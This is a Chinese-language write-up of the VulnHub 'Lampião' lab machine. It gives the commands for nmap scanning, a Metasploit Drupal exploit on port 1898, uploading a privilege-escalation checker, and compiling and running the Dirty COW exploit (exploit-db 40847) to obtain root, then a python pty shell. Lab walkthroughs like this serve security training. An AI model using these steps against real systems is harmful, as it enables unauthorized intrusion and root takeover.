vulnhub-Lampiao髒牛提權

1_Ry發表於2021-08-05

準備工作

在vulnhub官網下載lampiao靶機Lampião: 1 ~ VulnHub

匯入到vmware,設定成NAT模式

開啟kali準備進行滲透(ip:192.168.200.6)

 

資訊收集

 利用nmap進行ip埠探測

nmap -sS 192.168.200.6/24 

 探測到ip為192.168.200.18的靶機,開放了80埠和22埠

再用nmap對所有埠進行探測,確保沒有別的遺漏資訊

nmap -sV -p- 192.168.200.18

 還有一個1898埠也是http服務

 80埠什麼都沒有

1898埠有一個登陸介面, CMS是Drupal的,搜一下關於Drupal的漏洞

  

msfconsole

使用msf利用漏洞 

 

 選擇第四個漏洞進行利用

use 4

set RHOSTS 192.168.200.18

set RPORT 1898

run

 成功返回一個meterpreter會話

接下來我利用了linux-exploit-suggester.sh指令碼去探測漏洞,下載地址mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool (github.com)

 

 先下載到kali,然後在upload上傳到靶機的/tmp/資料夾中

upload /root/桌面/linux-exploit-suggester-master/linux-exploit-suggester.sh /tmp/1.sh

接著輸入shell進入終端,進入/tem/資料夾執行指令碼,但執行的時候說沒有許可權

用chmod +x 1.sh賦予執行許可權 在./1.sh執行

 其中顯示有黃顏色的表示存在漏洞的可能性比較大,這裡省去測試環節,直接跳到dirty cow髒牛漏洞

 

dirty cow

 這裡直接給了漏洞exp,是一個cpp檔案,但是直接下載到靶機沒有cpp字尾,只能先下載到kali在上傳上去。https://www.exploit-db.com/download/40847

先退出終端再上傳,再shell返回終端,進入tmp資料夾

upload /root/下載/40847.cpp /tmp/40847.cpp

編譯執行(網上漏洞利用的過程)

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

./40847

 獲得了root的密碼,先使用python 通過pty.spawn()獲得互動式shell

python -c'import pty;pty.spawn("/bin/bash")'

再切換root使用者

 拿到flag

相關文章